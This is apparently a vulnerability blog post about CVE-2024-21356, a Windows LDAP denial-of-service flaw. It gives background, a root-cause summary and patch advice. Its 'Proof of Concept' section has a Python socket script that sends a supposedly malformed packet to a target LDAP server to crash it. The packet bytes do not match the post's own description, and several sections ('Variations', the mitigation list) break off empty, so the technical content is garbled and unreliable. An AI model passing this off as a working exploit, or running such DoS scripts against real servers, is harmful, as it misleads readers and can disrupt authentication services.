CVE CyberSecurity Database News

CVE-2024-21356 - Understanding and Exploiting the Windows LDAP Denial of Service Vulnerability

Poster -

Microsoft Windows has long been at the heart of global enterprise infrastructure, and its Lightweight Directory Access Protocol (LDAP) implementation is widely used for directory services, authentication, and user management. In early 2024, a serious vulnerability—CVE-2024-21356—was uncovered, affecting how Microsoft Windows handles LDAP requests. This security hole can let an attacker perform a Denial of Service (DoS) attack against Windows systems running LDAP, potentially stalling authentication services and impacting business continuity.

If you’re a sysadmin, security researcher, or just someone interested in Windows vulnerabilities, this post will break down the vulnerability, show you relevant code snippets, direct you to the original sources, and dig deep into how it could be exploited.

What is CVE-2024-21356?

CVE-2024-21356 is a security vulnerability where certain malformed LDAP queries sent to Windows LDAP servers can cause them to crash or hang, effectively resulting in a Denial of Service (DoS). An unauthenticated attacker can abuse the flaw remotely, sending specifically crafted network packets and disrupting legitimate operations.

Microsoft’s official advisory described it as

> _"A denial of service vulnerability exists when Windows LDAP improperly handles specially crafted requests. An attacker who successfully exploited this vulnerability could cause the affected system to stop responding. This vulnerability is only exploitable by sending specially crafted network requests to a Windows LDAP server."_
> Microsoft Security Advisory

How Does Windows LDAP Work?

LDAP is a lightweight directory access protocol, mostly used in Microsoft Active Directory environments to handle authentication, user queries, and directory lookups. Usually, LDAP listens on port 389 (unsecured) or 636 (with SSL/TLS).

A basic LDAP query might look like this using PowerShell

# Simple LDAP search using built-in tools
$searcher = New-Object System.DirectoryServices.DirectorySearcher
$searcher.Filter = "(objectClass=user)"
$results = $searcher.FindAll()
$results | ForEach-Object { $_.Properties["samaccountname"] }

The LDAP server receives and parses these queries. If a query is malformed in a specific way, due to faulty handling and insufficient input checks, it could cause the LDAP service to crash or become unresponsive, as exploited in CVE-2024-21356.

Root Cause

The vulnerability exists in how the Windows LDAP service processes certain requests. Specifically, if an attacker crafts a malformed ASN.1 (Abstract Syntax Notation One) request—either with an excessive payload, missing required fields, or invalid lengths—the LDAP service fails to handle the exception gracefully, resulting in a crash or hang.

Standard LDAP (port 389)

- LDAPS (LDAP over SSL/TLS, port 636)

Proof of Concept and Exploit

> ⚠️ Disclaimer: This is for educational and defensive purposes only. Never attack any system you do not own or have explicit permission to test.

You can use Python’s ldap3 and socket libraries to send malformed packets directly to the LDAP service.

Step 1: Sending a Malformed Pack

Here’s a Python snippet that creates a malformed LDAP bind request (missing required parts) and sends it to the target server:

import socket

# Target Windows LDAP server
TARGET_IP = "192.168.1.100"
TARGET_PORT = 389

# Minimal ASN.1 sequence with bad length (malformed packet)
malformed_packet = b'\x30\x03\x02\x01\x01'  # SEQUENCE, wrong length & content

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    sock.connect((TARGET_IP, TARGET_PORT))
    print(f"Connected to {TARGET_IP}:{TARGET_PORT}")

    sock.sendall(malformed_packet)
    print("Malformed packet sent.")

    # Wait for response / or server crash
    data = sock.recv(1024)
    print(f"Received: {data}")
except Exception as e:
    print("Exception:", e)
finally:
    sock.close()

What to Expect:
If vulnerable, the LDAP service may crash, stop responding, or consume 100% CPU, leading to a DoS condition until the service or machine is restarted.

Variations:

Prevention and Mitigation

Microsoft issued a patch for this issue in February 2024’s Patch Tuesday batch. To protect your systems:

For more mitigation guidance, see

- Microsoft LDAP Security Best Practices

Original Resources and Further Reading

- Microsoft Security Guide: CVE-2024-21356
- NVD CVE-2024-21356 Info
- LDAP Protocol Specification (RFC 4511)
- LDAP Security in Active Directory

Conclusion

CVE-2024-21356 is a reminder that even old, battle-tested protocols like LDAP can have new, critical flaws. Unpatched servers are at risk—not just from outsiders, but even from insiders who have access to internal networks. Remediation is straightforward: patch your Windows servers and secure your LDAP endpoints. If you’re interested in digging deeper, check the RFCs and Microsoft’s technical notes.

Timeline

Published on: 02/13/2024 18:15:52 UTC
Last modified on: 02/13/2024 18:22:58 UTC